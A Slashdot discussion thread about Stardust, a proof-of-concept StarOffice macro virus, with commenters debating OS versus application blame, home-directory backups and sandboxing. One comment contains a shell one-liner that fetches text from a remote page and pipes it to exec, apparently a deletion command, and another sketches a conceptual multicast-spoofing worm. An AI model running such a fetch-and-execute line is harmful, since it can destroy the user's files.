First StarOffice Virus Sighted

Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."

it's still basically a OS security issue

[yagu]

First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.

Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

Re:it's still basically a OS security issue

[Otter]

If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

Re:it's still basically a OS security issue

[99BottlesOfBeerInMyF]

Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficient access to do damage, including erasing personal files and likely even connecting to the internet and sending spam or a DoS attack. Programs like this will have vulnerabilities. Right now, this is not too serious of a threat. A real piece of malware based on this would probably not even propagate anywhere, however it is a valid issue going forward, especially if market share increases.

The solution in my mind is twofold. First, institute a VM, or Mandatory access control, or jail or whatever you want to call it for all applications. This would limit the exposure from the user directory, to just the files and network access of the application, unless the user specifically allowed the behavior. The second component is a versioned filesystem with redundancy to make sure any files it overwrote could be quickly and painlessly rolled back to the uncorrupted version. This still leaves some room for damage. A subtle malware could add text to a document that might be overlooked, and some clever social engineering could expand the attack. Still, I think both of these are logical directions for security improvements.

Re:it's still basically a OS security issue

[jfengel]

I think that protecting the user's own data is sufficient reason to blame this on the app writer, not the OS. Yeah, it's the OS's fault if rootkit-level harm can be done, but I think of that as a whole separate problem. Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

There's plenty of blame to go around, but it points out a general clue: writing secure generalized systems is hard, whether it's an OS or a word processor that thinks it's an OS. Security is everybody's problem, and you have to think about it every time you get input from a user. Limiting the effect of security failure isn't the same as abnegating responsibility to prevent that failure. The more power you give that user, the more responsibility YOU have to ensure that power isn't misused.

Re:it's still basically a OS security issue

[anagama]

If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

For me, the system is the least valuable area. I have system cds and if it gets borked, I can reinstall and reconfigure. A hassle "yes", end of the world "no". What concerns me is all the irreplaceable content in my home directory. In my home dir, I have all the privileges I need to ruin it all. Now, I keep backups because I know that all computers always fail (at some point in time), but most people are pretty cavalier about backing up stuff. Of course, when I backup, I only backup my data because really, the system is stupidly easy to replace. A person who loses all their baby pics due to a malicious macro isn't really going to care that their printer config is still good.

Re:it's still basically a OS security issue

[blibbler]

A Jail for all programs? I am no free software advocate, but that seems pretty extreme! Can't you give them a warning, or at least probation?

Re:it's still basically a OS security issue

[zlogic]

Mandrake stores the user's backups in a read-only (for normal users) directory. So the virus can damage the user's home dir, but yesterday's (or last week's) backup will remain intact, because only root can hose it and not the user or the virus.

Re:it's still basically a OS security issue

[I'm+Don+Giovanni]

"People who don't backup /home every night deserve everything they get."

But even if you did backup every night, what if some malware corrupted some documents in /home? Maybe changed some vital data in a spreadsheet? Maybe the change would be too subtle to notice, and you're spreadsheet would start producing incorrect calculations due to the incorrect data, unbeknownst to you. And when you did your nightly backup, guess what, the corrupted spreadsheet gets backed up as well, so now your backup store is corrupt.

Re:it's still basically a OS security issue

[Fred_A]

What do you mean "uninterrupted" ? You'd have lost your high score file !!

Re:it's still basically a OS security issue

[chill]

If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

I don't, nor do I known anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

  -Charles

Re:it's still basically a OS security issue

[Fred_A]

In the open source world, we don't jail programs, we make them do community work ;)

Missing the best part.

What? No link to the "adult content?"

Virus!?

[Kesch]

It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

I don't call that a virus, I call it a feature.

Hopefully the next version will allow you to enter keywords to guide the image downloader.

Re:Virus!?

[IAmTheDave]

I don't call that a virus, I call it a feature.

Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.

I knew it was insecure.

Re:Virus!?

[Jim+Hall]

What, no screenshots?

virus?

[gEvil+(beta)]

It downloads an image file with adult content from the Internet and opens that file in a new document

That's no virus, that's a productivity tool!

A Virus

[CastrTroy]

Is this really a virus. It downloads and displays and image with adult content, and displays it. It doesn't run any malicious code, doesn't touch your file system, and doesn't leave any trace after it has run. Sure, you may get in trouble at work, if it downloads the single image, but I think that most IT departments would understand, and wouldn't be able to do much for you for downloading a single image with adult content.

Re:A Virus

[Golias]

A "Proof of concept" malware example for a non-Microsoft product, such as StarOffice or OS X, is demonstrated in a controlled lab: Big news!

An actual virus which utterly cripples Windows PC's is discovered in the wild: Business as usual.

That's pretty much all you need to know about Windows and MS-Office.

Re:A Virus

[packetmon]

What do you think would happen if someone scripted something into it... Remember its a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec

Learning period

[suv4x4]

The more open source products get used, the more their authors will realize that it's not enough to be l33t to write a secure product.

It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.

Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.

Re:Learning period

[TouchOfRed]

Ha. One of these days an offer is going to work, and ill have free pron and FREE MONEY. Then we'll see whose laughing.

Re:Learning period

[msuarezalvarez]

I am quite sure they'll be quite happy to hear about your donation of time/money/whatever.

POC != virus

proof of concept is not a virus, sure it could be, but until its in the wild its not really

Why go through the trouble?

[MagicM]

If you want to trick someone into viewing an image, why not just embed the image in the document?

Where is the "proof" (and the "virus") in this "proof of concept virus"?

Re:Why go through the trouble?

[sidfaiwu]

The point is that the image is downloaded and displayed without the user doing anything other than opening the document. The 'proof' is that the code executed even if the user did not want it to. The download-and-display-an-image code could easily be replaced with more malicious code. That is the 'virus' part.

Re:Why go through the trouble?

[CastrTroy]

Here's my new virus. I put it in a spreadsheet, it's just 1 line of code. =SUM(A1:A50). When put in cell A51, it automatically gets run every time you load the spreadsheet, and will run when you change the contents of A1 through A50. Just because you can make a program perform a function without user interaction doesn't mean you can run malicious code that will mess with the system/user files, or mess with the hardware in malicious ways.

Re:Why go through the trouble?

[BasilBrush]

No, that would be the malware part. To be a virus, it needs a method of propagating itself to other systems and files. This may have that, but it's not explicitly stated in TFA or it's links.

Bypass mechanism

[16K+Ram+Pack]

Not enough specifics. Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.

I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.

Nice!

[derxob]

"It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting." What a great feature! Jokes aside, this actually could be dangerous if used correctly. The proof-of-concept is only demonstrated with a porn image, but imagine what could potentially be used in place of the adult content..

Proof of Concept to infect the planet

[packetmon]

I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting ? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.

Re:Proof of Concept to infect the planet

[killmenow]

The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assuming most people (even here, on slashdot, where all the geeks are) don't know what multicast is...because it's not in widescale use. From Wikipedia: "In order to prevent conflicts (where two groups have the same group IP) most routers will not forward multicast messages onto other network segments. This behaviour is, however, sometimes configurable on a case-by-case basis (it depends on the router software)."

And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability. Also from Wikipedia: "Multicast security is a major issue. Standard, practical, communications security solutions normally employ symmetric cryptography. But applying that to IP Multicast traffic would enable any of the receivers to pose as the sender. This is clearly unacceptable. The IETF MSEC workgroup is developing security protocols to solve this problem, mostly within the architectural framework of the IPsec protocol suite.

IPsec cannot be used in the multicast scenario because IPsec security associations are bound to two hosts and not many. IETF proposed a new protocol TESLA, which is quite convincing and flexible for multicast security."

No malicious code

[Duds]

If you're at the wrong kind of workplace, suddenly having porn on your screen is pretty bloody malicious.

Erh... no, boss, erh... no, that wasn't me

[Opportunist]

Me? Looking at porn at work? Noooo, sorry, must be that virus goin' round.

A heartfelt THANK YOU to the autor!

Thanks!

[Chris+Bradshaw]

"proof-of-concept"

Cool... Thanks for the idea!

Respectfully Signed,
Anonymous Redmond Washington Resident

Losing data is always the real problem.

[khasim]

If you're in a company and a "virus" takes out one of the system files on one of your servers ... but the data is safe, you have less of a problem than if a "virus" leaves the server intact, but deletes all of your data.

It's always about the security of the data.

Which is why part of the OS's job is to restrict the ability of regular users as much as possible.

When all that is in danger is your personal home directory, that's really as good as the OS can be.

If we're talking single user/home machines ... the risk is greater that your hard drive will fail before you get a "virus" on your Linux box. With a failed hard drive (and no backup), you've lost all your data. At some point, it is up to the admin (the user in this case) to back-up his/her data. There is a point at which the OS/app's responsibility ends and the admin's begins.

OpenOffice too!

[levell]

Although the summary doesn't explicitly say it, the article confirms that this affects OO as well as StarOffice

Yawn

[jofi]

So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.

Proof of security

[MobyDisk]

This virus doesn't do any damage. Is that because Star Basic runs in a sandbox and can't actually do damage? Or is it because the proof-of-concept virus didn't want to do any damage? If there is a sandbox, all this did is prove how secure Star Office is, not how vulnerable it is.

Is this really a virus?

[xutopia]

Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

hm..

[DoctorDyna]

It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."

Just because all it does is download porn, doesnt mean that it couldnt download a shell script that wipes out the MBR on your hard disk.

goatse

[EccentricAnomaly]

What? No link to the "adult content?"

be careful what you wish for... the 'adult content' could be goatse

No need to worry

[sootman]

Both StarOffice users have been contacted and were warned to be careful.

Meet my mother

[atrocious+cowpat]

"I don't, nor do I known anyone that does, back up their /home folder daily."

My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a seperate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

It may seem like overkill, but I set things up this way not because I'm scared of the havock a virus might wreak, but because I know that my mother every once in a while f*s up, deletes or otherwise ruins important files, preferably spreadsheets that are extremely painful to reconstruct. Her own files - not system files. And usually she doesn't notice until either 3 days or 3 months later.

I sleep well, she can do whatever she wants, and everyone is happy.